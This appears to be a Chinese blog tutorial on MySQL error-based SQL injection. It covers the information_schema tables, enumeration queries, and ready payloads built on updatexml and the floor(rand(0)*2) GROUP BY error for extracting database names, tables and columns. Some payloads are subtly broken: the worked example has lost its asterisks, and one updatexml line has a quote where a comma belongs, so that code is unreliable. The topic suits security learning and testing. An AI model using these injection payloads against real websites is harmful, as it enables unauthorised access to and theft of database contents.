sql简单的报错查询

关于INFORMATION_SCHEMA表的简单介绍
  information_schema   :数据库是MySQL系统自带的数据库,它提供了数据库元数据的访问方式。

information_schema 数据库中注入时要用到的表有( schemata tables columns)

                        chemata 表中   字段
                                 schema_name      存放数据库名
                        tables  表中   字段
                                 table_schema       数据表所属的数据库名
                                 table_name          存放数据库所有表名
                        columns  表中  字段
                                 table_schema       数据表所属的数据库名
                                 table_name          存放数据库所有表名
                                 column_name      存放数据库所有表里面的列名

SQL注入时常用到的几条查询语句

                  查找数据库名称
                          select schema_name from information_schema.schemata   相当于   show databases;
                  查mysqllname所有表名
                        select table_name from information_schema.tables where table_schema=mysqlname
                  查询mysqlname数据库tablename表中的所有字段
                        select column_name from information_schema.columns where table_schema="mysqlname" and table_name="tablename"
报错注入原理:

由于rand和group+by的冲突,即rand()是不可以作为order by的条件字段,同理也不可以为group by的条件字段。
  floor(rand(0)*2) 获取不确定又重复的值造成mysql的错误
  floor:向下取整,只保留整数部分,rand(0) -> 0~1

报错注入特点:
                 页面上没有显示位,但是有SQL语句执行错误信息

报错语句可以分为MYSQL报错


01.PNG

PHP报错


02.PNG

常用语句
                            and updatexml (1,payload'1)
                          
                            and updatexml (1,concat(0x7e,payload,0x7e),1)      0x7e  是: 转码来的


                            (select 1 from (select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a)

这里的concat(payload)是关键语句 一般都是在这里爆数据库,表和字段
如:
(select 1 from (select count(),concat((database()),floor(rand(0)2))x from information_schema.tables group by x)a)
这是爆数据库名

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • Sql注入定义: 就是通过把sql命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行...
    付出从未后悔阅读 713评论 0 3
  • 注: 以下payload均基于单引号字符型注入。若是整型注入,需将单引号与后面的注释符(--+)都去掉;若是双引号...
    就是爱文艺阅读 6,317评论 1 4
  • http://127.0.0.1/sqli-labs-master 浅析MySQL中concat以及group_c...
    BerL1n阅读 8,655评论 0 4
  • 目录: 0x00 mysql一般注入(select) 0x01 mysql一般注入(insert、update) ...
    JasonChiu17阅读 2,077评论 0 0
  • 2017年中医科在各级领导的正确领导、兄弟科室的支持和科室人员的共同努力下,在提供原有中医特色服务的基础上,不断提...
    古典悠梦阅读 1,876评论 2 2